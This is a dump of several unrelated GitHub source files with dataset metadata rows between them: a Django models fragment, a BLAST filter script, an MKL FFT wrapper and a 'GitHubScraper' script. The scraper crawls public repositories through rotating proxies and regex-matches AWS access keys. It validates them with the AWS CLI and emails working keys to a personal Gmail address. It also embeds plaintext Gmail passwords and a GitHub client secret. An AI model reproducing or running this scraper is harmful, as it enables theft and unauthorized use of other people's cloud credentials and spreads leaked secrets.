member = models.ForeignKey(Member)
def __unicode__(self):
return '%s' % self.project.name
class Offer_Time(Base):
""" Class describes members who offered time for the projects """
offered_by = models.ForeignKey(Member)
project = models.ForeignKey(Project)
offered_type = models.IntegerField(choices=OFFERED_TYPES, default=0)
start_date = models.DateField(max_length=20, blank=True, null=True)
end_date = models.DateField(max_length=20, blank=True, null=True)
description = RichTextField(blank=True, null = True)
def __unicode__(self):
return self.offered_by
class Goods_Required_For_Project(Base):
""" Class describes goods required for the projects """
name = models.CharField(max_length=100)
description = RichTextField(blank=True, null = True)
url = models.URLField(blank=True)
qty = models.CharField(max_length=100, blank=True, null=True)
created_by = models.ForeignKey(Member, related_name='GoodsCreatedBy')
project = models.ForeignKey(Project)
def __unicode__(self):
return self.name
class Goods_Given_From_Member_To_Project(Base):
""" Class describes goods given from members to givers in the projects """
goods = models.ForeignKey(Goods_Required_For_Project)
given_by = models.ForeignKey(Member)
description = RichTextField(blank=True, null = True)
url = models.URLField(blank=True)
qty = models.CharField(max_length=100, blank=True, null=True)
def __unicode__(self):
return self.given_by
class Member_Skills(Base):
""" Class describes member skills to be used in the projects """
created_by = models.ForeignKey(Member, related_name='SkillsCreatedBy')
project = models.ForeignKey(Project)
skills = models.ManyToManyField(Skills, blank = True, null = True)
def __unicode__(self):
return self.project.name
class Influence(Base):
""" Class describes members who influence who for what purpose for \
the project """
influenced_by = models.ForeignKey(Member, related_name='InfluencedBy')
project = models.ForeignKey(Project)
description = RichTextField(blank=True, null = True)
def __unicode__(self):
return self.volunteer
class Post(Base):
""" Class describes posts of the projects """
post_type = models.IntegerField(choices=POST_TYPE_CHOICES, default=0)
project = models.ForeignKey(Project)
image = ImageWithThumbsField(upload_to='static/%Y/%m/%d', sizes=((90,
120), (180, 240), (360, 480)), blank=True,
null=True)
URL = models.CharField('Link url', max_length=200, blank=True)
description = RichTextField(blank=True, null = True)
video_file = models.FileField(upload_to='static/%Y/%m/%d', blank=True,
null=True)
audio_file = models.FileField(upload_to='static/%Y/%m/%d', blank=True,
null=True)
doc = models.FileField(upload_to='static/%Y/%m/%d', blank=True, null=True)
tags = models.ManyToManyField(Member, blank=True, null=True)
featured = models.BooleanField(default=False)
def __unicode__(self):
return self.post_type
class Task(Base):
""" Class describes project tasks """
name = models.CharField(max_length=100)
description = RichTextField(blank=True, null = True)
associated_goal = models.ForeignKey(Goals, blank=True, null=True)
assign_to = models.ManyToManyField(Member, blank=True, null=True)
priority = models.IntegerField(choices=TASK_PRIORITY_CHOICES, default=1)
status = models.IntegerField(choices=TASK_STATUS_CHOICES, default=3)
content_type = models.ForeignKey(ContentType,
verbose_name=_('content type'),
related_name='TaskCPTM')
object_id = models.TextField(_('object ID'))
from_date = models.DateField(max_length=20, blank=True, null=True)
to_date = models.DateField(max_length=20)
parent = models.ForeignKey('self', blank=True, null=True)
def __unicode__(self):
return self.name
| UTF-8 | Python | false | false | 7,712 | py | 37 | models.py | 35 | 0.653786 | 0.639263 | 0 | 224 | 33.428571 | 112 |
staccDOTsol/GitHubScraper | 1,932,735,295,260 | 2850f500c5ad2ee9dfefa0eb2eff7493b7ea02ea | 63910ef32836751a8cf24d8b8e9ec17b2fd2757c | /python.py | 5cb5782ff8569cd4bd9a360f2d405bc30b9a4efe | []
| no_license | https://github.com/staccDOTsol/GitHubScraper | 8222810cfc2f099df90095bfec9d45e776081d00 | 5fb145ca2f5a0102a8e6c36a6a5d4d8f75be6b32 | refs/heads/master | 2023-01-22T06:45:42.058551 | 2020-12-04T07:52:05 | 2020-12-04T07:52:05 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import requests
from urllib3.contrib import pyopenssl
import json
import re
import smtplib
import lxml.html as html
import numpy
import time
import os
from subprocess import *
import subprocess
from compiler.pycodegen import EXCEPT
from multiprocessing.dummy import Pool as ThreadPool
bannedIps = []
xyz = 221875000
requests.adapters.DEFAULT_RETRIES = 1
def newpool(num):
try:
global xyz
repos = []
x = xyz - (num * 5000)
pool = ThreadPool(num)
xyzs = []
i = 0
y = num
while i <= num:
xyzs.append(xyz / y * i)
i = i + 1
i = 0
while i <= y:
repos.append('https://api.github.com/repositories?since=' + str(int(xyzs[i]) + 1))
print str(int(xyzs[i]) + 1)
i = i + 1
#print i
#print repos
results = pool.map(getContrib, repos)
#close the pool and wait for the work to finish
print 'waiting... xyz=' + str(xyz)
pool.close()
pool.join()
except Exception as e:
newpool(1)
#getContrib(repos, shake)
def getCommits(url, shake):
import urllib2
global bannedIps
import json
#print url
page = requests.get('https://free-proxy-list.net/')
webpage = html.fromstring(page.content)
proxy = []
i = 0
proxies = webpage.xpath("//tbody/tr/td[1]/text()")
ports = webpage.xpath("//tbody/tr/td[2]/text()")
secure = webpage.xpath("//td[7]/text()")
for proxyy in proxies:
if secure[i] == 'yes':
proxy.append((proxyy) + ":" + (ports[i]))
#print proxy[i]
i = i + 1
#proxy.append('198.100.158.142:3128')
#proxy.append('192.95.4.14:8080')
#proxy.append('167.114.23.80:8080')
#proxy.append('167.114.47.242:8080')
#proxy.append('158.69.31.45:3128')
#proxy.append('198.50.212.32:8799')
#proxy.append('149.56.147.46:80')
#proxy.append('144.217.31.225:3128')
page = requests.get('https://hidemy.name/en/proxy-list/?type=s')
webpage = html.fromstring(page.content)
i = 0
proxies = webpage.xpath("//tbody/tr/td[1]/text()")
ports = webpage.xpath("//tbody/tr/td[2]/text()")
for proxyy in proxies:
proxy.append((proxyy) + ":" + (ports[i]))
#print proxy[i]
i = i + 1
page = requests.get('https://www.socks-proxy.net/')
webpage = html.fromstring(page.content)
i = 0
proxies = webpage.xpath("//tbody/tr/td[1]/text()")
ports = webpage.xpath("//tbody/tr/td[2]/text()")
secure = webpage.xpath("//td[7]/text()")
for proxyy in proxies:
if secure[i] == 'yes':
proxy.append((proxyy) + ":" + (ports[i]))
#print proxy[i]
i = i + 1
from random import randint
from random import seed
import random
import uuid
rand = numpy.random.randint(0, len(proxy))
#print rand
#print proxy[rand]
done = False
while done == False:
if 'https://' + proxy[rand] not in bannedIps:
proxyDict = {
'https':'https://' + proxy[rand]
#'https':'https://168.235.64.108:8081'
}
done = True
print proxyDict
try:
time.sleep(0.5)
#req = requests.get(url, proxies=proxyDict)
req = requests.get(url + "?" + shake, proxies=proxyDict, timeout = 40)
print url
json = json.loads(req.content)
for item in json:
print item['sha']
try:
f = open("logs.txt", "a+b")
f.write(item['sha'] + "\n")
f.close()
print item['sha']
getUrl(url[:-8] + '/contents/?ref=' + item['sha'], shake)
except Exception as e:
f = open("logs.txt", "a+b")
f.write('getBranch: ' + str(e) + ': ' + req.content +'\n')
f.close()
print 'getBranch: ' + str(e) + ': ' + req.content
getCommits(url, shake)
except Exception as e:
print e
getCommits(url, shake)
#print req.content
def getUrl(url, shake):
import urllib2
global bannedIps
import json
#print url
page = requests.get('https://free-proxy-list.net/')
webpage = html.fromstring(page.content)
proxy = []
i = 0
proxies = webpage.xpath("//tbody/tr/td[1]/text()")
ports = webpage.xpath("//tbody/tr/td[2]/text()")
secure = webpage.xpath("//td[7]/text()")
for proxyy in proxies:
if secure[i] == 'yes':
proxy.append((proxyy) + ":" + (ports[i]))
#print proxy[i]
i = i + 1
#proxy.append('198.100.158.142:3128')
#proxy.append('192.95.4.14:8080')
#proxy.append('167.114.23.80:8080')
#proxy.append('167.114.47.242:8080')
#proxy.append('158.69.31.45:3128')
#proxy.append('198.50.212.32:8799')
#proxy.append('149.56.147.46:80')
#proxy.append('144.217.31.225:3128')
page = requests.get('https://hidemy.name/en/proxy-list/?type=s')
webpage = html.fromstring(page.content)
i = 0
proxies = webpage.xpath("//tbody/tr/td[1]/text()")
ports = webpage.xpath("//tbody/tr/td[2]/text()")
for proxyy in proxies:
proxy.append((proxyy) + ":" + (ports[i]))
#print proxy[i]
i = i + 1
page = requests.get('https://www.socks-proxy.net/')
webpage = html.fromstring(page.content)
i = 0
proxies = webpage.xpath("//tbody/tr/td[1]/text()")
ports = webpage.xpath("//tbody/tr/td[2]/text()")
secure = webpage.xpath("//td[7]/text()")
for proxyy in proxies:
if secure[i] == 'yes':
proxy.append((proxyy) + ":" + (ports[i]))
#print proxy[i]
i = i + 1
from random import randint
from random import seed
import random
import uuid
rand = numpy.random.randint(0, len(proxy))
#print rand
#print proxy[rand]
done = False
while done == False:
if 'https://' + proxy[rand] not in bannedIps:
proxyDict = {
'https':'https://' + proxy[rand]
#'https':'https://168.235.64.108:8081'
}
done = True
print proxyDict
try:
print url
#req = requests.get(url, proxies=proxyDict)
time.sleep(0.5)
req = requests.get(url + "&" + shake, proxies=proxyDict, timeout = 40)
f = open("logs.txt", "a+b")
f.write(url + "&" + shake + '\n')
f.close()
print url + "&" + shake
json = json.loads(req.content)
print json
for item in json:
#time.sleep(.8)
try:
for attribute, value in item.iteritems():
if attribute == 'type':
if value == 'dir':
f = open("logs.txt", "a+b")
f.write('dir: ' + item['name'] + '\n')
f.close()
print 'dir: ' + item['name']
#print attribute, value # example usage
if url.split("?ref=",1)[1]:
contentsDir = url.split("/?ref=",1)[0] + '/' + item['name'] + '/?ref=' + url.split("?ref=",1)[1]
else:
contentsDir = url + '/' + item['name']
getUrl(contentsDir, shake)
elif value == 'file':
f = open("logs.txt", "a+b")
f.write(item['download_url'] + '\n')
f.close()
print item['download_url']
#content2 = requests.get(item['download_url'], proxies=proxyDict).content
content2 = requests.get(item['download_url']).content
id = re.search(r'(?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9])', content2)
#if (id):
# print "id: " + id.group()
#print 'searching...'
key = re.search(r'(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])', content2)
if (key):
if (id):
p = Popen( ["sh"], stdin=PIPE, stdout=PIPE )
time.sleep(1)
p.stdin.write("aws configure\n")
time.sleep(4)
p.stdin.write(id.group() + "\n")
time.sleep(1)
p.stdin.write(key.group() + "\n")
time.sleep(1)
p.stdin.write("\n")
time.sleep(1)
p.stdin.write("\n")
time.sleep(1)
def awsdescribe():
p = subprocess.Popen(["aws", "ec2", "describe-instances"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = p.stderr.read()
return output
out = awsdescribe()
print out
if 'AuthFailure' in out:
print 'authfailure!'
else:
msg = "\r\n".join([
"From: jarettrsdunn@gmail.com",
"To: jarettrsdunn@gmail.com",
"Subject: new match",
"",
"id: " + id.group() + "\nkey: " + key.group() + '\n\n'
])
username = 'jarettrsdunn@gmail.com'
password = 'yarite'
server = smtplib.SMTP('smtp.gmail.com:587')
server.ehlo()
server.starttls()
fromaddr = "jarettrsdunn@gmail.com"
toaddrs = ["jarettrsdunn@gmail.com"]
server.login(username,password)
server.sendmail(fromaddr, toaddrs, msg)
server.quit()
f = open("output.txt", "a+b")
f.write("id: " + id.group() + "\nkey: " + key.group() + '\n\n')
f.close()
print "id: " + id.group() + "key: " + key.group()
except Exception as e:
f = open("logs.txt", "a+b")
f.write('geturl: url=' + url + ' : ' + str(e) + ': ' + req.content + '\n')
f.close()
if 'good news' in req.content:
print 'goodnews, geturl: url=' + url + ' : ' + str(e) + ': ' + req.content
getUrl(url, shake)
else:
print 'geturl: url=' + url + ' : ' + str(e) + ': ' + req.content
except Exception as e:
#bannedIps.append(proxyDict['https'])
#print bannedIps
f = open("logs.txt", "a+b")
f.write('exception ip: ' + str(proxyDict) + ' & geturl: ' + str(e) + '\n')
f.close()
print 'exception ip: ' + str(proxyDict) + ' & geturl: ' + str(e)
getUrl(url, shake)
#print req.content
def getContrib(url):
global bannedIps
print 'start...'
shake = 'client_id=e3e911583253bb372cf1&client_secret=ee07a00c62b08be09ce29db876865af37ec5c1d1'
import urllib2
import json
#print url
page = requests.get('https://free-proxy-list.net/')
webpage = html.fromstring(page.content)
proxy = []
i = 0
proxies = webpage.xpath("//tbody/tr/td[1]/text()")
ports = webpage.xpath("//tbody/tr/td[2]/text()")
secure = webpage.xpath("//td[7]/text()")
for proxyy in proxies:
if secure[i] == 'yes':
proxy.append((proxyy) + ":" + (ports[i]))
#print proxy[i]
i = i + 1
page = requests.get('https://hidemy.name/en/proxy-list/?type=s')
webpage = html.fromstring(page.content)
i = 0
proxies = webpage.xpath("//tbody/tr/td[1]/text()")
ports = webpage.xpath("//tbody/tr/td[2]/text()")
for proxyy in proxies:
proxy.append((proxyy) + ":" + (ports[i]))
#print proxy[i]
i = i + 1
page = requests.get('https://www.socks-proxy.net/')
webpage = html.fromstring(page.content)
i = 0
proxies = webpage.xpath("//tbody/tr/td[1]/text()")
ports = webpage.xpath("//tbody/tr/td[2]/text()")
secure = webpage.xpath("//td[7]/text()")
for proxyy in proxies:
if secure[i] == 'yes':
proxy.append((proxyy) + ":" + (ports[i]))
#print proxy[i]
i = i + 1
#proxy.append('198.100.158.142:3128')
#proxy.append('192.95.4.14:8080')
#proxy.append('167.114.23.80:8080')
#proxy.append('167.114.47.242:8080')
#roxy.append('158.69.31.45:3128')
#proxy.append('198.50.212.32:8799')
#proxy.append('149.56.147.46:80')
#proxy.append('144.217.31.225:3128')
from random import randint
from random import seed
import random
import uuid
rand = numpy.random.randint(0, len(proxy))
#print rand
#print proxy[rand]
done = False
while done == False:
if 'https://' + proxy[rand] not in bannedIps:
proxyDict = {
'https':'https://' + proxy[rand]
#'https':'https://168.235.64.108:8081'
}
done = True
print proxyDict
try:
print url
#req = requests.get(url, proxies=proxyDict)
#rand = numpy.random.randint(1, 11)
from random import randint
time.sleep(randint(1, 16))
req = requests.get(url + "&" + shake, proxies=proxyDict, timeout = 40)
json = json.loads(req.content)
#print req.content
first = True
#for item in json:
print str(json[0]['id']) + ": " + str(json[0]['full_name'])
#print item['id']
if first == True:
#print item['id']
first = False
commits = 'https://api.github.com/repos/' + json[0]['full_name'] + '/commits'
branches = 'https://api.github.com/repos/' + json[0]['full_name'] + '/branches'
#print contents
id = json[0]['id']
found = False
for line in open('ids.txt').readlines():
found = False
#print line
if line.startswith(str(id)):
found = True
print 'found id already friend'
break
if not found:
getCommits(commits, shake)
f = open("ids.txt", "a+b")
f.write(str(id) + "\n")
f.close()
#print id
repos = 'https://api.github.com/repositories?since=' + str(id)
print str(id)
getContrib(repos)
except Exception as e:
print e
getContrib(url)
print 'DONE!'
repos = []
newpool(1)
#print req.content
import time
print 'lala'
if 1:
msg = "\r\n".join([
"From: jarettrsdunn@gmail.com",
"To: jarettrsdunn@gmail.com",
"Subject: new match",
"",
"id: wooo\n\n"
])
username = 'jarettrsdunn@gmail.com'
password = 'w0rdp4ss1'
server = smtplib.SMTP('smtp.gmail.com:587')
server.ehlo()
server.starttls()
fromaddr = "jarettrsdunn@gmail.com"
toaddrs = ["jarettrsdunn@gmail.com"]
server.login(username,password)
server.sendmail(fromaddr, toaddrs, msg)
server.quit()
newpool(10)
| UTF-8 | Python | false | false | 15,731 | py | 2 | python.py | 1 | 0.481724 | 0.446507 | 0 | 455 | 33.540659 | 129 |
wegnerce/python_scripting | 10,909,216,957,227 | b5c001ccdc0616b195ad670b297cb018b5906171 | b4b900170acb702b12aa77c2708f59ec2107fa49 | /metagenomics/filter_blast.py | 39da08b29dfad936d74df09eef601d0177df0075 | []
| no_license | https://github.com/wegnerce/python_scripting | cf6435d0fa2ad41615c6ff06d44f28449904272c | 6230d3f0489c67af18db5b13e48e888018b2cceb | refs/heads/main | 2023-04-11T23:28:39.990998 | 2021-04-28T06:43:17 | 2021-04-28T06:43:17 | 362,132,027 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Tue Jan 19 10:50:17 2016
@author: calle
"""
# needed modules
import csv
import taxman as tx
# required paths
blast_out = "/media/STORAGE1/Stasja_pro/to_filter/mRNA_assemblies/total/total_mRNA_contigs_trans.faa.out"
blast_out_filtered = "/media/STORAGE1/Stasja_pro/to_filter/mRNA_assemblies/total/total_mRNA_contigs_trans_out_filtered.out"
# process blast output, filter hits originating from plants
with open(blast_out, "rb") as infile, open(blast_out_filtered, "wb") as outfile:
blast_reader = csv.reader(infile, delimiter = "\t")
for line in blast_reader:
gi_hit = line[1].split("|")[1]
if not 33090 in tx.getPathByTaxid(tx.getTaxidByGi(gi_hit)):
print tx.getPathByTaxid(tx.getTaxidByGi(gi_hit))
outfile.write("\t".join(line)+"\n")
| UTF-8 | Python | false | false | 826 | py | 156 | filter_blast.py | 155 | 0.690073 | 0.663438 | 0 | 24 | 33.416667 | 123 |
lovro-sinda/dretveno_programiranje | 6,451,040,888,938 | f858c1a43d44bc603f16436ce7386ff0cfb805a1 | 6862d9d91b40de9e15c932131d8b9cb2641c1ee2 | /Moneyball/web_scraping/test.py | c6dca9bd5314587e2612c8243fd7e17eb28f6eef | []
| no_license | https://github.com/lovro-sinda/dretveno_programiranje | fdfbb0e7b00cb95b463fc75726dfb02c5a41df4a | 4d972e1f50e89f5d760ae834f7075a009f2888f9 | refs/heads/master | 2020-05-02T04:06:29.744638 | 2019-09-14T09:34:31 | 2019-09-14T09:34:31 | 177,742,455 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pandas as pd
df = pd.read_csv("dr1.csv")
df['new_column'] = 'some_value'
df.to_csv('dr1.csv')
| UTF-8 | Python | false | false | 101 | py | 32 | test.py | 6 | 0.653465 | 0.633663 | 0 | 4 | 24.25 | 31 |
ajeldorado/falco-python | 17,274,358,496,634 | 87d49f54cba853fa5b4ae5b1dfda2630acea5e3b | 7650c4b0404ff25c26ed5c29e544ed00e259ca50 | /falco/mkl_fft.py | 3a3b144cffc57e2157e2196d261aa5c0284de8a9 | [
"Apache-2.0"
]
| permissive | https://github.com/ajeldorado/falco-python | b32e1ab24d521a6790b4c18a96a4fa9d239c7882 | 406ccf60392542630a7f1f629fc020b8c8e613d2 | refs/heads/master | 2022-11-06T03:27:12.604912 | 2022-10-07T15:22:19 | 2022-10-07T15:22:19 | 137,521,218 | 5 | 2 | Apache-2.0 | false | 2022-10-07T15:22:58 | 2018-06-15T18:43:56 | 2022-06-13T03:06:15 | 2022-10-07T15:22:19 | 7,116 | 5 | 4 | 0 | Python | false | false | """
Wrapper for the MKL FFT routines. This implements very fast FFT on Intel
processors, much faster than the stock fftpack routines in numpy/scipy.
"""
from __future__ import division, print_function
import numpy as np
import ctypes as _ctypes
import os
from dftidefs import *
def load_libmkl():
r"""Loads the MKL library if it can be found in the library load path.
Raises
------
ValueError
If the MKL library cannot be found.
"""
if os.name == 'posix':
try:
lib_mkl = os.getenv('LIBMKL')
if lib_mkl is None:
raise ValueError('LIBMKL environment variable not found')
return _ctypes.cdll.LoadLibrary(lib_mkl)
except:
pass
try:
return _ctypes.cdll.LoadLibrary("libmkl_rt.dylib")
except:
raise ValueError('MKL Library not found')
else:
try:
return _ctypes.cdll.LoadLibrary("mkl_rt.dll")
except:
raise ValueError('MKL Library not found')
mkl = load_libmkl()
def mkl_rfft(a, n=None, axis=-1, norm=None, direction='forward', out=None, scrambled=False):
r"""Forward/backward 1D double-precision real-complex FFT.
Uses the Intel MKL libraries distributed with Anaconda Python.
Normalisation is different from Numpy!
By default, allocates new memory like 'a' for output data.
Returns the array containing output data.
See Also
--------
rfft, irfft
"""
if axis == -1:
axis = a.ndim-1
# This code only works for 1D and 2D arrays
assert a.ndim < 3
assert (axis < a.ndim and axis >= -1)
assert (direction == 'forward' or direction == 'backward')
# Convert input to complex data type if real (also memory copy)
if direction == 'forward' and a.dtype != np.float32 and a.dtype != np.float64:
if a.dtype == np.int64 or a.dtype == np.uint64:
a = np.array(a, dtype=np.float64)
else:
a = np.array(a, dtype=np.float32)
elif direction == 'backward' and a.dtype != np.complex128 and a.dtype != np.complex64:
if a.dtype == np.int64 or a.dtype == np.uint64 or a.dtype == np.float64:
a = np.array(a, dtype=np.complex128)
else:
a = np.array(a, dtype=np.complex64)
order = 'C'
if a.flags['F_CONTIGUOUS'] and not a.flags['C_CONTIGUOUS']:
order = 'F'
# Add zero padding or truncate if needed (incurs memory copy)
if n is not None:
m = n if direction == 'forward' else (n // 2 + 1)
if a.shape[axis] < m:
# pad axis with zeros
pad_width = np.zeros((a.ndim, 2), dtype=np.int)
pad_width[axis,1] = m - a.shape[axis]
a = np.pad(a, pad_width, mode='constant')
elif a.shape[axis] > m:
# truncate along axis
b = np.swapaxes(a, axis, 0)[:m,]
a = np.swapaxes(b, 0, axis).copy()
elif direction == 'forward':
n = a.shape[axis]
elif direction == 'backward':
n = 2*(a.shape[axis]-1)
# determine output type
if direction == 'backward':
out_type = np.float64
if a.dtype == np.complex64:
out_type = np.float32
elif direction == 'forward':
out_type = np.complex128
if a.dtype == np.float32:
out_type = np.complex64
# Configure output array
assert a is not out
if out is not None:
assert out.dtype == out_type
for i in range(a.ndim):
if i != axis:
assert a.shape[i] == out.shape[i]
if direction == 'forward':
assert (n // 2 + 1) == out.shape[axis]
else:
assert out.shape[axis] == n
assert not np.may_share_memory(a, out)
else:
size = list(a.shape)
size[axis] = n // 2 + 1 if direction == 'forward' else n
out = np.empty(size, dtype=out_type, order=order)
# Define length, number of transforms strides
length = _ctypes.c_int(n)
n_transforms = _ctypes.c_int(np.prod(a.shape) // a.shape[axis])
# For strides, the C type used *must* be long
strides = (_ctypes.c_long*2)(0, a.strides[axis] // a.itemsize)
if a.ndim == 2:
if axis == 0:
distance = _ctypes.c_int(a.strides[1] // a.itemsize)
out_distance = _ctypes.c_int(out.strides[1] // out.itemsize)
else:
distance = _ctypes.c_int(a.strides[0] // a.itemsize)
out_distance = _ctypes.c_int(out.strides[0] // out.itemsize)
double_precision = True
if (direction == 'forward' and a.dtype == np.float32) or (direction == 'backward' and a.dtype == np.complex64):
double_precision = False
# Create the description handle
Desc_Handle = _ctypes.c_void_p(0)
if not double_precision:
mkl.DftiCreateDescriptor(_ctypes.byref(Desc_Handle), DFTI_SINGLE, DFTI_REAL, _ctypes.c_int(1), length)
else:
mkl.DftiCreateDescriptor(_ctypes.byref(Desc_Handle), DFTI_DOUBLE, DFTI_REAL, _ctypes.c_int(1), length)
# set the storage type
mkl.DftiSetValue(Desc_Handle, DFTI_CONJUGATE_EVEN_STORAGE, DFTI_COMPLEX_COMPLEX)
# set normalization factor
if norm == 'ortho':
scale = _ctypes.c_double(1 / np.sqrt(n))
mkl.DftiSetValue(Desc_Handle, DFTI_FORWARD_SCALE, scale)
mkl.DftiSetValue(Desc_Handle, DFTI_BACKWARD_SCALE, scale)
elif norm is None:
scale = _ctypes.c_double(1. / n)
s = mkl.DftiSetValue(Desc_Handle, DFTI_BACKWARD_SCALE, scale)
# set all values if necessary
if a.ndim != 1:
mkl.DftiSetValue(Desc_Handle, DFTI_NUMBER_OF_TRANSFORMS, n_transforms)
mkl.DftiSetValue(Desc_Handle, DFTI_INPUT_DISTANCE, distance)
mkl.DftiSetValue(Desc_Handle, DFTI_OUTPUT_DISTANCE, out_distance)
mkl.DftiSetValue(Desc_Handle, DFTI_INPUT_STRIDES, _ctypes.byref(strides))
mkl.DftiSetValue(Desc_Handle, DFTI_OUTPUT_STRIDES, _ctypes.byref(strides))
if scrambled:
s = mkl.DftiSetValue(Desc_Handle, DFTI_ORDERING, DFTI_BACKWARD_SCRAMBLED)
if direction == 'forward':
fft_func = mkl.DftiComputeForward
elif direction == 'backward':
fft_func = mkl.DftiComputeBackward
else:
assert False
# Not-in-place FFT
mkl.DftiSetValue(Desc_Handle, DFTI_PLACEMENT, DFTI_NOT_INPLACE)
mkl.DftiCommitDescriptor(Desc_Handle)
fft_func(Desc_Handle, a.ctypes.data_as(_ctypes.c_void_p), out.ctypes.data_as(_ctypes.c_void_p) )
mkl.DftiFreeDescriptor(_ctypes.byref(Desc_Handle))
return out
def mkl_fft(a, n=None, axis=-1, norm=None, direction='forward', out=None, scrambled=False):
r"""Forward/backward 1D single- or double-precision FFT.
Uses the Intel MKL libraries distributed with Anaconda Python.
Normalisation is different from Numpy!
By default, allocates new memory like 'a' for output data.
Returns the array containing output data.
See Also
--------
fft, ifft
"""
# This code only works for 1D and 2D arrays
assert a.ndim < 3
assert axis < a.ndim and axis >= -1
# Add zero padding if needed (incurs memory copy)
'''
if n is not None and n != a.shape[axis]:
pad_width = np.zeros((a.ndim, 2), dtype=np.int)
pad_width[axis,1] = n - a.shape[axis]
a = np.pad(a, pad_width, mode='constant')
'''
if n is not None:
if a.shape[axis] < n:
# pad axis with zeros
pad_width = np.zeros((a.ndim, 2), dtype=np.int)
pad_width[axis,1] = n - a.shape[axis]
a = np.pad(a, pad_width, mode='constant')
elif a.shape[axis] > n:
# truncate along axis
b = np.swapaxes(a, axis, -1)[...,:n]
a = np.swapaxes(b, -1, axis).copy()
# Convert input to complex data type if real (also memory copy)
if a.dtype != np.complex128 and a.dtype != np.complex64:
if a.dtype == np.int64 or a.dtype == np.uint64 or a.dtype == np.float64:
a = np.array(a, dtype=np.complex128)
else:
a = np.array(a, dtype=np.complex64)
# Configure in-place vs out-of-place
inplace = False
if out is a:
inplace = True
elif out is not None:
assert out.dtype == a.dtype
assert a.shape == out.shape
assert not np.may_share_memory(a, out)
else:
out = np.empty_like(a)
# Define length, number of transforms strides
length = _ctypes.c_int(a.shape[axis])
n_transforms = _ctypes.c_int(np.prod(a.shape) // a.shape[axis])
# For strides, the C type used *must* be long
strides = (_ctypes.c_long*2)(0, a.strides[axis] // a.itemsize)
if a.ndim == 2:
if axis == 0:
distance = _ctypes.c_int(a.strides[1] // a.itemsize)
else:
distance = _ctypes.c_int(a.strides[0] // a.itemsize)
# Create the description handle
Desc_Handle = _ctypes.c_void_p(0)
if a.dtype == np.complex64:
mkl.DftiCreateDescriptor(_ctypes.byref(Desc_Handle), DFTI_SINGLE, DFTI_COMPLEX, _ctypes.c_int(1), length)
elif a.dtype == np.complex128:
mkl.DftiCreateDescriptor(_ctypes.byref(Desc_Handle), DFTI_DOUBLE, DFTI_COMPLEX, _ctypes.c_int(1), length)
# Set normalization factor
if norm == 'ortho':
if a.dtype == np.complex64:
scale = _ctypes.c_float(1 / np.sqrt(a.shape[axis]))
else:
scale = _ctypes.c_double(1 / np.sqrt(a.shape[axis]))
mkl.DftiSetValue(Desc_Handle, DFTI_FORWARD_SCALE, scale)
mkl.DftiSetValue(Desc_Handle, DFTI_BACKWARD_SCALE, scale)
elif norm is None:
if a.dtype == np.complex64:
scale = _ctypes.c_float(1. / a.shape[axis])
else:
scale = _ctypes.c_double(1. / a.shape[axis])
mkl.DftiSetValue(Desc_Handle, DFTI_BACKWARD_SCALE, scale)
# set all values if necessary
if a.ndim != 1:
mkl.DftiSetValue(Desc_Handle, DFTI_NUMBER_OF_TRANSFORMS, n_transforms)
mkl.DftiSetValue(Desc_Handle, DFTI_INPUT_DISTANCE, distance)
mkl.DftiSetValue(Desc_Handle, DFTI_OUTPUT_DISTANCE, distance)
mkl.DftiSetValue(Desc_Handle, DFTI_INPUT_STRIDES, _ctypes.byref(strides))
mkl.DftiSetValue(Desc_Handle, DFTI_OUTPUT_STRIDES, _ctypes.byref(strides))
if scrambled:
s = mkl.DftiSetValue(Desc_Handle, DFTI_ORDERING, DFTI_BACKWARD_SCRAMBLED)
DftiErrorMessage(s)
if direction == 'forward':
fft_func = mkl.DftiComputeForward
elif direction == 'backward':
fft_func = mkl.DftiComputeBackward
else:
assert False
if inplace:
# In-place FFT
mkl.DftiCommitDescriptor(Desc_Handle)
fft_func(Desc_Handle, a.ctypes.data_as(_ctypes.c_void_p) )
else:
# Not-in-place FFT
mkl.DftiSetValue(Desc_Handle, DFTI_PLACEMENT, DFTI_NOT_INPLACE)
mkl.DftiCommitDescriptor(Desc_Handle)
fft_func(Desc_Handle, a.ctypes.data_as(_ctypes.c_void_p), out.ctypes.data_as(_ctypes.c_void_p) )
mkl.DftiFreeDescriptor(_ctypes.byref(Desc_Handle))
return out
def proper_fft2(a, norm=None, direction='forward', mkl_dir=None, fft_nthreads=0):
r"""Forward/backward 2D single- or double-precision FFT.
Uses the Intel MKL libraries distributed with Enthought Python.
Normalisation is different from Numpy!
By default, allocates new memory like 'a' for output data.
Returns the array containing output data.
See Also
--------
fft2, ifft2
"""
# input must be complex! Not exceptions
if a.dtype != np.complex128 and a.dtype != np.complex64:
raise ValueError('prop_fftw: Unsupported data type. Must be complex64 or complex128.')
# Create the description handle
Desc_Handle = _ctypes.c_void_p(0)
dims = (_ctypes.c_int64*2)(*a.shape)
if a.dtype == np.complex64:
mkl.DftiCreateDescriptor(_ctypes.byref(Desc_Handle), DFTI_SINGLE, DFTI_COMPLEX, _ctypes.c_int(2), dims)
elif a.dtype == np.complex128:
mkl.DftiCreateDescriptor(_ctypes.byref(Desc_Handle), DFTI_DOUBLE, DFTI_COMPLEX, _ctypes.c_int(2), dims)
# Set normalization factor
if norm == 'ortho':
if a.dtype == np.complex64:
scale = _ctypes.c_float(1.0 / np.sqrt(np.prod(a.shape)))
else:
scale = _ctypes.c_double(1.0 / np.sqrt(np.prod(a.shape)))
mkl.DftiSetValue(Desc_Handle, DFTI_FORWARD_SCALE, scale)
mkl.DftiSetValue(Desc_Handle, DFTI_BACKWARD_SCALE, scale)
elif norm is None:
if a.dtype == np.complex64:
scale = _ctypes.c_float(1.0 / np.prod(a.shape))
else:
scale = _ctypes.c_double(1.0 / np.prod(a.shape))
mkl.DftiSetValue(Desc_Handle, DFTI_BACKWARD_SCALE, scale)
# Set input strides if necessary
if not a.flags['C_CONTIGUOUS']:
in_strides = (_ctypes.c_int*3)(0, a.strides[0] // a.itemsize, a.strides[1] // a.itemsize)
mkl.DftiSetValue(Desc_Handle, DFTI_INPUT_STRIDES, _ctypes.byref(in_strides))
if direction == 'forward':
fft_func = mkl.DftiComputeForward
elif direction == 'backward':
fft_func = mkl.DftiComputeBackward
else:
assert False
